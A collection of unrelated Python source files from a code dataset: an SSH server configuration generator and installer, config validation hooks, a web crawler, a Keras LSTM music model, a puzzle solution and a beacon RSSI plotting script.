chroot directory.\n\t\t\tif isinstance(info[\"chroot_directory\"], str):\n\t\t\t\tconfiguration += f'\\n ChrootDirectory {info[\"chroot_directory\"]}'\n\n\t\t\t# root permission.\n\t\t\tl = \"no\"\n\t\t\tif info[\"root_permissions\"] and info[\"key_authentication\"]: l = \"prohibit-password\"\n\t\t\telif info[\"root_permissions\"]: l = \"yes\"\n\t\t\tconfiguration += f'\\n PermitRootLogin {l}'\n\n\t\t\t# connection options.\n\t\t\tconfiguration += f'\\n X11Forwarding {self.__convert_boolean__(info[\"x11_forwarding\"])}'\n\t\t\tconfiguration += f'\\n AllowTcpForwarding {self.__convert_boolean__(info[\"tcp_forwarding\"])}'\n\n\t\t\t# default options.\n\t\t\tconfiguration += f'\\n PermitTunnel {self.__convert_boolean__(info[\"permit_tunnel\"])}'\n\t\t\tconfiguration += f'\\n AllowStreamLocalForwarding {self.__convert_boolean__(info[\"allow_stream_local_forwarding\"])}'\n\t\t\tconfiguration += f'\\n GatewayPorts {self.__convert_boolean__(info[\"gateway_ports\"])}'\n\t\t\tconfiguration += f'\\n PermitTTY yes'\n\t\t\t\n\t\t\t# check ip filter.\n\t\t\tif info[\"ip_filter\"]:\n\n\t\t\t\t# match verified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address {self.__sum_list__(info[\"allowed_ips\"])}'\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t\t\t# match unverified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address *,!{self.__sum_list__(info[\"allowed_ips\"])}'\n\t\t\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"Your ip address is not authorized.\" \"Authorize your ip address to access user 
[{username}].\"'\n\n\t\t\t# no ip filter.\n\t\t\telse:\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t# match none authorized users.\n\t\t#if '*all*' not in list(users.keys()):\n\t\tconfiguration += f'\\nMatch User *,!{self.__sum_list__(list(users.keys()))}'\n\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\tconfiguration += '\\n PubkeyAuthentication no'\n\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"You are not authorized to access user [$USER] over ssh.\"'\n\t\tconfiguration += \"\\n\"\n\n\t\t# save sshd.\n\t\tif save:\n\t\t\tfile = File(path='/tmp/sshd_config', data=configuration)\n\t\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\t\tfile.save()\n\t\t\tfp = FilePath(f\"/etc/ssh/sshd_config\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=644, sudo=True)\n\t\t\tfp.ownership.set(owner=\"root\", group=None, sudo=True)\n\t\t\tos.system(\"sudo systemctl restart ssh\")\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to save the sshd configuration.\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully created the sshd configuration.\", {\n\t\t\t\t\"sshd\":configuration,\n\t\t\t})\n\n\t\t#\n\t# system functions.\n\tdef __sum_list__(self, list):\n\t\treturn Array(path=False, array=list).string(joiner=',')\n\tdef __convert_boolean__(self, boolean):\n\t\tif boolean: return \"yes\"\n\t\telse: return \"no\"\n\tdef __check_user_items__(self, users):\n\n\t\t# iterate.\n\t\tfor username, info in users.items():\n\t\t\t\n\t\t\t# check options (all keys are optional, so every option used by create() needs a default).\n\t\t\ttry: info[\"root_permissions\"]\n\t\t\texcept KeyError: info[\"root_permissions\"] = True\n\t\t\ttry: info[\"password_authentication\"]\n\t\t\texcept KeyError: info[\"password_authentication\"] = False\n\t\t\ttry: info[\"key_authentication\"]\n\t\t\texcept KeyError: info[\"key_authentication\"] = True\n\t\t\ttry: info[\"ip_filter\"]\n\t\t\texcept KeyError: info[\"ip_filter\"] = False\n\t\t\ttry: \n\t\t\t\tinfo[\"allowed_ips\"]\n\t\t\t\tif not isinstance(info[\"allowed_ips\"], list):\n\t\t\t\t\treturn r3sponse.error(f\"Invalid usage, parameter [users.{username}.allowed_ips] is supposed to be a list with allowed ip addresses.\")\n\t\t\texcept KeyError: info[\"allowed_ips\"] = []\n\t\t\ttry: info[\"sftp_only\"]\n\t\t\texcept KeyError: info[\"sftp_only\"] = False\n\t\t\ttry: info[\"chroot_directory\"]\n\t\t\texcept KeyError: info[\"chroot_directory\"] = None\n\t\t\ttry: info[\"x11_forwarding\"]\n\t\t\texcept KeyError: info[\"x11_forwarding\"] = False\n\t\t\ttry: info[\"tcp_forwarding\"]\n\t\t\texcept KeyError: info[\"tcp_forwarding\"] = False\n\t\t\ttry: info[\"permit_tunnel\"]\n\t\t\texcept KeyError: info[\"permit_tunnel\"] = False\n\t\t\ttry: info[\"allow_stream_local_forwarding\"]\n\t\t\texcept KeyError: info[\"allow_stream_local_forwarding\"] = False\n\t\t\ttry: info[\"gateway_ports\"]\n\t\t\texcept KeyError: info[\"gateway_ports\"] = False\n\n\t\t# response.\n\t\treturn r3sponse.success(\"Successfully checked the user items.\")\n\n\t\t#\n\tdef __check_utils_installed__(self, usernames=[]):\n\n\t\t# iterate.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tto_install = []\n\t\tfor username in usernames:\n\t\t\t\n\t\t\t# non existent.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/.version.py\")\n\t\t\tif not fp.exists(sudo=True): \n\t\t\t\tto_install.append(username)\n\n\t\t\t# check version.\n\t\t\telse: \n\t\t\t\tversion = utils.__execute__([\"sudo\", \"cat\", fp.path])\n\t\t\t\tgithub_version = utils.__execute__([\"curl\", 
\"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/.version.py?raw=true\"])\n\t\t\t\tif str(version) != str(github_version):\n\t\t\t\t\tto_install.append(username)\n\n\t\t# install.\n\t\tif len(to_install) > 0:\n\t\t\tresponse = self.__install_utils__(to_install)\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully verified the ssht00ls utils installation.\")\n\n\t\t#\n\tdef __install_utils__(self, usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# create tmp lib.\n\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\tutils_tmp = \"/tmp/utils/\"\n\t\tif not os.path.exists(utils_lib):\n\t\t\traise ValueError(f\"ssht00ls library [{utils_lib}] does not exist.\")\n\t\tos.system(f\"rsync -az {utils_lib} {utils_tmp} --delete\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__pycache__\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__init__.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/isdir.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/size.py\")\n\t\tif not Files.exists(utils_tmp):\n\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#2).\")\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\n\t\t\t# check if ssh is correctly installed.\n\t\t\tresponse = installation.check_installed(username=username)\n\n\t\t\t# install the ssh correctly for the specified user.\n\t\t\tif response[\"error\"] != None:\n\t\t\t\tresponse = installation.install(username=username)\n\t\t\t\tif response[\"error\"] != None: return response\n\n\t\t\t# copy.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/\")\n\t\t\tos.system(f\"sudo rm -fr {fp.path}\")\n\t\t\tos.system(f\"sudo rsync -az {utils_tmp} {fp.path} --delete\")\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True, recursive=True)\n\t\t\tfp.permission.set(permission=755, recursive=True, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#3).\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the ssht00ls utils.\")\n\n\t\t#\n\tdef __install_banner__(self, banner=\"\", usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# save banner.\n\t\tfile = File(path='/tmp/banner', data=banner)\n\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\tfile.save()\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\t\t\tfp = FilePath(f\"/{syst3m.defaults.vars.homes}{username}/.ssh/banner\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=755, sudo=True)\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to install the banner for user [{username}].\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the banner.\")\n\n\t\t#\n\t#\n\n# Initialized classes.\nsshd = SSHD()\n\n\n\n\n\n\n","sub_path":"ssht00ls/.legacy/3.14.0/classes/sshd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"401023112","text":"from vt_manager.communication.sfa.rspecs.elements.element import Element \nfrom 
vt_manager.communication.sfa.rspecs.elements.pltag import PLTag\n\nclass SFAv1PLTag:\n    @staticmethod\n    def add_pl_tag(xml, name, value):\n        pl_tag_elem = xml.add_element(name)\n        pl_tag_elem.set_text(value)\n    \n    @staticmethod\n    def get_pl_tags(xml, ignore=[]):\n        pl_tags = []\n        for elem in xml.iterchildren():\n            if elem.tag not in ignore:\n                pl_tag = PLTag({'tagname': elem.tag, 'value': elem.text})\n                pl_tags.append(pl_tag) \n        return pl_tags\n\n","sub_path":"vt_manager/src/python/vt_manager/communication/sfa/rspecs/elements/versions/sfav1PLTag.py","file_name":"sfav1PLTag.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616238270","text":"from __future__ import annotations\n\nimport re\nimport time\nfrom collections import defaultdict\nfrom functools import wraps\nfrom typing import Any, Callable, Dict, Literal, TYPE_CHECKING, TypeVar, Union, Type\n\nif TYPE_CHECKING:\n    from clustertools.file_objects.configs.global_config import GlobalConfig\n    from clustertools.file_objects.configs.project_config import ProjectConfig\n    from clustertools.shared.environ import PseudoEnviron\n    from clustertools.shared.object_monitors import MonitoredEnviron, MonitoredList\n    from clustertools.shared.typing import (_BoundHook,\n                                            _CheckedVal,\n                                            _Config,\n                                            _Hook,\n                                            _UncheckedVal,\n                                            EmailAddress,\n                                            OneOrMore,\n                                            WallTimeStr)\n\n\nEMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$')\n\n\n########################################################################\n#                          CONFIG HOOK HELPERS                         #\n########################################################################\n# _T = TypeVar('_T')\n# class SimpleDefaultDict(dict):\n#     # ADD DOCSTRING\n#     \"\"\"\n#     Similar to collections.defaultdict, but doesn't add missing keys.\n#     Accepts an additional keyword-only argument 'default' that may\n#     be either a default value to return for missing keys, or a\n#     callable that accepts the missing key as an argument.\n#\n#     Used here to provide a dummy callable hook for config fields that\n#     don't require any special validation or extra work\n#     \"\"\"\n#     def __init__(\n#             self,\n#             *arg,\n#             default: Union[_T, Callable[..., _T]] = None,\n#             **kwargs\n#     ) -> None:\n#         # ADD DOCSTRING\n#         if len(arg) > 1:\n#             raise TypeError(\n#                 f\"{self.__class__.__name__} expected at most 1 argument, got \"\n#                 f\"{len(arg)}\"\n#             )\n#         super().__init__(*arg, **kwargs)\n#         if callable(default):\n#             self.default = default\n#         else:\n#             self.default = lambda key: default\n#\n#     def __missing__(self, key: Any) -> _T:\n#         return self.default(key)\n#\n#\n# def dummy_hook(inst: _Config, val: _T) -> _T:\n#     return val\n\n\nclass ParrotDict(dict):\n    def __missing__(self, key):\n        return key\n\n\ndef bindable(\n        func: _Hook[[_Config, _UncheckedVal], _CheckedVal]\n) -> _BoundHook[[_UncheckedVal], _CheckedVal]:\n    # ADD DOCSTRING - decorates a function 'func', allowing it to be\n    # bound to an object 'instance' at runtime and optionally added as\n    # an instance method\n    @wraps(func)\n    def bind(instance: _Config) -> _BoundHook:\n        return func.__get__(instance)\n\n    return bind\n\n\n# def enforce_value_type(value: Any, _type: OneOrMore[Type]) -> None:\n#     if not isinstance(value, _type):\n#         if hasattr(_type, '__iter__'):\n#             assert len(_type) == 2  # no fields should accept more than 2 types\n#             t = f\"either '{_type[0].__name__}' or '{_type[1].__name__}'\"\n#         else:\n#             t = f\"'{_type.__name__}'\"\n#         raise TypeError(\n#             f\"Type of assigned value must be 
{t}. Received \"\n#             f\"'{value.__class__.__name__}'\"\n#         )\n\n\n########################################################################\n#                            TYPE CONVERTERS                           #\n########################################################################\n                        # Python types -> str #\ndef environ_to_str(environ: Union[Dict[str, str], PseudoEnviron]) -> str:\n    str_fmt = '\\n'.join('='.join(item) for item in environ.items())\n    if str_fmt != '':\n        str_fmt = '\\n' + str_fmt\n    return str_fmt\n\n\nto_str_funcs = {\n    bool: lambda b: str(b).lower(),\n    MonitoredList: lambda l: ','.join(l),\n    MonitoredEnviron: environ_to_str\n}\nto_str_funcs = defaultdict(lambda: str, to_str_funcs)\n\n\ndef type_to_str(value: Any) -> str:\n    return to_str_funcs[type(value)](value)\n\n\n                        # str -> Python types #\n@bindable\ndef str_to_environ(inst: _Config, environ_str: str) -> MonitoredEnviron:\n    keys_vals = map(lambda x: x.split('='), environ_str.strip().splitlines())\n    env_dict = {k.strip(): v.strip() for k, v in keys_vals}\n    validate_item_hook = inst._object_validate_hooks['environ']\n    post_update_hook = inst._object_post_update_hooks['environ']\n    return MonitoredEnviron(initial_env=dict(),\n                            custom_vars=env_dict,\n                            validate_item_hook=validate_item_hook,\n                            post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_modules(inst: _Config, modules_str: str) -> MonitoredList:\n    modules_list = [m.strip() for m in modules_str.strip().split(',')]\n    validate_item_hook = inst._object_validate_hooks['modules']\n    post_update_hook = inst._object_post_update_hooks['modules']\n    return MonitoredList(modules_list,\n                         validate_item_hook=validate_item_hook,\n                         post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_email_list(inst: _Config, email_str: str) -> MonitoredList:\n    email_list = [m.strip() for m in email_str.strip().split(',')]\n    validate_item_hook = inst._object_validate_hooks['email']\n    post_update_hook = inst._object_post_update_hooks['email']\n    return MonitoredList(email_list,\n                         validate_item_hook=validate_item_hook,\n                         post_update_hook=post_update_hook)\n\n\nto_type_funcs = {\n    'environ': str_to_environ,\n    'modules': str_to_modules,\n    'email': str_to_email_list\n}\n\n@bindable\ndef str_to_type(\n        inst: _Config,\n        key: str,\n        value: str\n) -> Union[str, bool, int, MonitoredEnviron[str, str], MonitoredList[str]]:\n    if value == 'true':\n        return True\n    elif value == 'false':\n        return False\n    elif value.isdigit():\n        return int(value)\n    else:\n        try:\n            return inst._to_type_funcs[key](value)\n        except KeyError:\n            # then it must be a str\n            return value\n\n\n########################################################################\n#                        MONITORED OBJECT HOOKS                        #\n########################################################################\n                        # validate_item_hooks #\ndef validate_email(email: str) -> None:\n    # used by itself when individual items added to/replaced in\n    # email_list and as part of 'validate_email_list' when entire field\n    # is replaced\n\n    is_valid = bool(email == 'INFER' or EMAIL_PATTERN.match(email))\n    if not is_valid:\n        raise ValueError(\n            f\"{email} does not appear to be formatted as a valid email \"\n            f\"address (you can pass 'infer' to use the default email address \"\n            f\"for your account)\"\n        )\n\n\nBASE_OBJECT_VALIDATE_HOOKS = {'email': validate_email}\n\n\n                          # post_update_hooks #\n@bindable\ndef environ_post_update_global(inst: GlobalConfig) -> None:\n    default_environ = inst._config.project_defaults.runtime_environment.environ\n    environ_str = environ_to_str(default_environ)\n    inst._configparser.set('project_defaults.runtime_environment',\n                           
'environ',\n environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef environ_post_update_project(inst: ProjectConfig) -> None:\n environ_str = environ_to_str(inst._config.runtime_environment.environ)\n inst._configparser.set('runtime_environment', 'environ', environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_global(inst: GlobalConfig) -> None:\n modules_str = ','.join(inst._config.project_defaults.runtime_environment.modules)\n inst._configparser.set('project_defaults.runtime_environment',\n 'modules',\n modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_project(inst: ProjectConfig) -> None:\n modules_str = ','.join(inst._config.runtime_environment.modules)\n inst._configparser.set('runtime_environment', 'modules', modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_global(inst: GlobalConfig) -> None:\n emails_str = ','.join(inst._config.project_defaults.notifications.email)\n inst._configparser.set('project_defaults.notifications',\n 'email',\n emails_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_project(inst: ProjectConfig) -> None:\n emails_str = ','.join(inst._config.notifications.email)\n inst._configparser.set('notifications', 'email', emails_str)\n inst.write_config_file()\n\n\nGLOBAL_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_global,\n 'modules': modules_post_update_global,\n 'email': email_post_update_global\n}\n\n\nPROJECT_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_project,\n 'modules': modules_post_update_project,\n 'email': email_post_update_project\n}\n\n\n########################################################################\n# SHARED HOOKS (BaseConfig) #\n########################################################################\n@bindable\ndef validate_job_basename(inst: _Config, new_basename: str) -> str:\n # TODO: should logic for preventing changes to attribute when\n # submission/jobs in progress be handled here or on Project object?\n if len(new_basename) > 15:\n raise ValueError(\"Job names may be up to 15 characters in length\")\n elif not new_basename[0].isalpha():\n raise ValueError(\n \"Job names must start with an alphabetic character ([a-zA-Z])\"\n )\n elif re.search('\\s', new_basename) is not None:\n raise ValueError(\"Job names may not contain whitespace\")\n return new_basename\n\n\n@bindable\ndef validate_walltime_str(inst: _Config, walltime_str: str) -> WallTimeStr:\n try:\n time.strptime(walltime_str, '%H:%M:%S')\n except ValueError:\n try:\n time.strptime(walltime_str, '%M:%S')\n except ValueError:\n raise ValueError(\n \"Malformed string value for 'wall_time'. 
Format should be \"\n \"'HH:MM:SS', or 'MM:SS' if requesting < 1 hour\"\n )\n return walltime_str\n\n\n@bindable\ndef monitor_modules(\n inst: _Config,\n new_modules: OneOrMore[str]\n) -> MonitoredList:\n # called when config field is *replaced*, rather than edited\n if isinstance(new_modules, str):\n new_modules = [new_modules]\n else:\n new_modules = list(new_modules)\n if isinstance(inst, GlobalConfig):\n post_update_hook = modules_post_update_global\n else:\n post_update_hook = modules_post_update_project\n return MonitoredList(new_modules,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst=inst))\n\n\n@bindable\ndef monitor_environ(inst: _Config, environ: Dict[str, str]) -> MonitoredEnviron:\n # called when setting the environ config field, rather than updating\n # individual variables\n if not all(isinstance(i, str) for i in sum(environ.items(), ())):\n raise TypeError(\"All keys and values in environ mapping must be 'str'\")\n if isinstance(inst, GlobalConfig):\n post_update_hook = environ_post_update_global\n else:\n post_update_hook = environ_post_update_project\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=environ,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst=inst))\n\n\n@bindable\ndef monitor_email(\n inst: _Config,\n new_emails: OneOrMore[str]\n) -> MonitoredList[EmailAddress]:\n if isinstance(new_emails, str):\n new_emails = [new_emails]\n else:\n new_emails = list(new_emails)\n for eml in new_emails:\n validate_email(eml)\n if isinstance(inst, GlobalConfig):\n post_update_hook = email_post_update_global\n else:\n post_update_hook = email_post_update_project\n return MonitoredList(new_emails,\n validate_item_hook=validate_email,\n post_update_hook=post_update_hook(inst=inst))\n\n\nBASE_CONFIG_UPDATE_HOOKS = {\n 'job_basename': validate_job_basename,\n 'wall_time': validate_walltime_str,\n 'modules': monitor_modules,\n 'environ': monitor_environ,\n 'email': monitor_email\n}\n\n\n########################################################################\n# GLOBAL CONFIG HOOKS #\n########################################################################\n@bindable\ndef move_projects(inst: GlobalConfig, new_dir: str) -> str:\n # TODO: write me... this is a tricky one. will need to\n # inst._cluster.check_output() a 'mv' command for each project in\n # the old project_dir. 
Also should confirm\n # inst._cluster.is_dir(PurePosixPath(new_dir)) first\n # enforce_value_type(value=new_dir, _type=str)\n raise NotImplementedError(\"Moving project directory is not yet supported\")\n\n\n# @bindable\n# def launch_in_project_dir_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef validate_shell_executable(inst: GlobalConfig, new_exe: str) -> str:\n # update cluster object, which conveniently validates executable\n # enforce_value_type(value=new_exe, _type=str)\n inst._cluster.executable = new_exe\n return new_exe\n\n\n# @bindable\n# def confirm_project_deletion_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef check_default_prefer_value(\n inst: GlobalConfig,\n pref: Literal['local', 'remote', 'recent']\n) -> None:\n if pref not in ('local', 'remote', 'recent'):\n raise ValueError(\n \"default file syncing behavior must be either 'local', 'remote', \"\n \"or 'recent'\"\n )\n\n\nGLOBAL_CONFIG_UPDATE_HOOKS = {\n 'project_dir': move_projects,\n 'executable': validate_shell_executable,\n 'default_prefer': check_default_prefer_value,\n}\n\n\n########################################################################\n# PROJECT CONFIG HOOKS #\n########################################################################\n@bindable\ndef update_config_from_global(inst: ProjectConfig, pref: bool) -> bool:\n # TODO: write me. This one's going to take some pre-planning &\n # coordinating between ProjectConfig, Project, MonitoredEnviron,\n # TrackedAttrConfig, etc. classes\n ...\n return pref\n\n\n@bindable\ndef init_project_job_monitor(inst: ProjectConfig, pref: bool) -> bool:\n # initializes a monitor Job object on the associated Project object\n # when auto_monitor_jobs is set to True, removes it when set to False\n if pref and not inst._config.monitoring.auto_monitor_jobs:\n inst._project._init_monitor()\n elif not pref:\n inst._project._monitor_script = inst._project._monitor = None\n return pref\n\n\nPROJECT_CONFIG_UPDATE_HOOKS = {\n 'auto_monitor_jobs': init_project_job_monitor\n}\n","sub_path":"clustertools/file_objects/configs/config_helpers.py","file_name":"config_helpers.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"315055910","text":"def f(lst,arr,dex):\n if dex==1:\n\n num=int(\"\".join(lst))\n while num!=1:\n\n\n if num%2==1:\n return\n else:\n num=num/2\n\n return True\n else:\n for i in range(0,dex):\n\n temp=lst[dex-1]\n lst[dex-1]=lst[i]\n lst[i]=temp\n if f(lst,arr,dex-1):\n return True\n\n\n\n temp = lst[dex - 1]\n lst[dex - 1] = lst[i]\n lst[i] = temp\n\n\n\n\n\n\nnum=input()\nlst=list(num)\narr=[]\nres=[]\nnum=int(num)\nif num==1:\n print('true')\nelse:\n if f(lst,arr,len(lst)):\n print('true')\n else:\n print('false')\n\n","sub_path":"Code/CodeRecords/2529/60644/245964.py","file_name":"245964.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"638388914","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\n\npages = set()\nrandom.seed(datetime.datetime.now())\n\ndef get_internal_links(bs_object, include_url):\n internal_links = []\n for link in bs_object.findAll(\"a\", href=re.compile(\"^(/|.*\" + include_url + \")\")):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not 
in internal_links:\n                internal_links.append(link.attrs['href'])\n    \n    return internal_links\n\ndef get_external_links(bs_object, exclude_url):\n    external_links = []\n    for link in bs_object.findAll(\"a\", href=re.compile(\"^(http|www)((?!\" + exclude_url + \").)*$\")):\n        if link.attrs['href'] is not None:\n            if link.attrs['href'] not in external_links:\n                external_links.append(link.attrs['href'])\n\n    return external_links\n\ndef split_address(address):\n    address_parts = address.replace(\"http://\", \"\").split(\"/\")\n    return address_parts\n\ndef get_random_external_link(starting_page):\n    html = urlopen(starting_page)\n    bs_object = BeautifulSoup(html, \"html.parser\")\n    external_links = get_external_links(bs_object, split_address(starting_page)[0])\n    if len(external_links) == 0:\n        internal_links = get_internal_links(bs_object, split_address(starting_page)[0])\n        return get_random_external_link(internal_links[random.randint(0, len(internal_links) - 1)])\n    else:\n        return external_links[random.randint(0, len(external_links) - 1)]\n\ndef follow_external_only(starting_site):\n    external_link = get_random_external_link(starting_site)\n    print(\"Random external link is: \" + external_link)\n    follow_external_only(external_link)\n\n#follow_external_only(\"http://www.oreilly.com\")\n\nall_external_links = set()\nall_internal_links = set()\n\ndef get_all_external_links(site_url):\n    html = urlopen(site_url)\n    bs_object = BeautifulSoup(html, \"html.parser\")\n    internal_links = get_internal_links(bs_object, split_address(domain)[0])\n    external_links = get_external_links(bs_object, split_address(domain)[0])\n\n    for link in external_links:\n        if link not in all_external_links:\n            all_external_links.add(link)\n            print(link)\n\n    for link in internal_links:\n        if link == \"/\":\n            link = domain\n        elif link[0:2] == \"//\":\n            link = \"http:\" + link\n        elif link[0:1] == \"/\":\n            link = domain + link\n        if link not in all_internal_links:\n            all_internal_links.add(link)\n            get_all_external_links(link)\n\ndomain = \"http://en.wikipedia.org/wiki/Kevin_Bacon\"#\"http://www.oreilly.com\"\nget_all_external_links(domain) \n\n","sub_path":"crawler/Chap3/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264598004","text":"from tensorflow.compat.v1 import keras\nfrom tensorflow.compat.v1.keras import layers\n\nBASIC_DEFAULT_MIN_NOTE = 48\nBASIC_DEFAULT_MAX_NOTE = 84\n# dimensionality of one event\nBASIC_EVENT_DIM = BASIC_DEFAULT_MAX_NOTE - BASIC_DEFAULT_MIN_NOTE + 2 # all note on events, note off, rest\nLOOKBACK_RNN_INPUT_EVENT_DIM = 120\n\n\ndef get_simple_rnn_model(event_dim, is_Training, temperature=1):\n    # input_shape: (None, : different sequence lengths (per batch; every sequence in one batch does have the same dimension)\n    #               EVENT_DIM) : dimensionality of one event\n    layer_one_args = {'units': 128,\n                      'input_shape': (None, event_dim),\n                      'return_sequences': True,\n                      'dropout': 0.5,\n                      'recurrent_dropout': 0.5,\n                      }\n    layer_two_args = {'units': 128,\n                      'return_sequences': True,\n                      'dropout': 0.5,\n                      'recurrent_dropout': 0.5,\n                      }\n    # for generating\n    if not is_Training:\n        # we predict one by one event\n        layer_one_args['input_shape'] = (1, event_dim)\n        layer_one_args['batch_input_shape'] = (1, 1, event_dim)\n        layer_one_args['stateful'] = True\n        layer_two_args['stateful'] = True\n\n    model = keras.Sequential()\n    model.add(layers.LSTM(**layer_one_args))\n    # second LSTM layer\n    model.add(layers.LSTM(**layer_two_args))\n    model.add(layers.Lambda(lambda x: x/temperature))\n    model.add(layers.Dense(units=event_dim, activation='softmax'))\n\n    return model\n","sub_path":"magenta/models/my_rnn/my_simple_rnn_model.py","file_name":"my_simple_rnn_model.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"540065786","text":"from matplotlib import pyplot as plt \nimport json\nimport os\nimport operator\n\nfilterMethod = \"kalman\"\n\ndata_dir = os.getcwd() + \"/beacon-all-points-\" + filterMethod + \"/\"\nf = open(os.path.join(data_dir, \"beacon.json\"),\"r\")\ndata = json.load(f)\nf.close()\n\nsave_path = os.getcwd() + \"/Graphs/rssi_vs_distance_reported/\"\nif not(os.path.isdir(save_path)) : \n\tos.mkdir(save_path)\n\ndistance = {}\nrssi = {}\nnoOfBeacons = 10\n\nfor elem in data[\"beacon\"]:\n\tfor values in elem[\"beaconData\"]:\n\t\tif values[\"id3\"] in distance :\n\t\t\tdistance[values[\"id3\"]].append(values[\"distance\"])\n\t\telse :\n\t\t\tdistance[values[\"id3\"]] = [values[\"distance\"]]\n\n\t\tif values[\"id3\"] in rssi :\n\t\t\trssi[values[\"id3\"]].append(values[\"rssi\"])\n\t\telse :\n\t\t\trssi[values[\"id3\"]] = [values[\"rssi\"]]\n\t\t\nfor beaconNo in range(1, noOfBeacons+1) :\n\tplt.figure(figsize=(16, 10))\n\tplt.title(\"Variation in RSSI vs reported distance from beacon \" + str(beaconNo)) \n\tplt.xlabel(\"Distance in meters\") \n\tplt.ylabel(\"RSSI in dBm\") \n\tsort_axis = operator.itemgetter(0)\n\tsorted_zip = sorted(zip(distance[beaconNo], rssi[beaconNo]), key=sort_axis)\n\tsort_distance, sort_rssi = zip(*sorted_zip)\n\tplt.plot(sort_distance, sort_rssi, \"-ob\") \n\tplt.grid()\n\t# plt.show()\n\tfilename = os.path.join(save_path, \"rssi_vs_distance_\" + str(beaconNo))\n\tplt.savefig(filename, dpi=200, bbox_inches='tight')\n\tplt.close()","sub_path":"BTP/CC 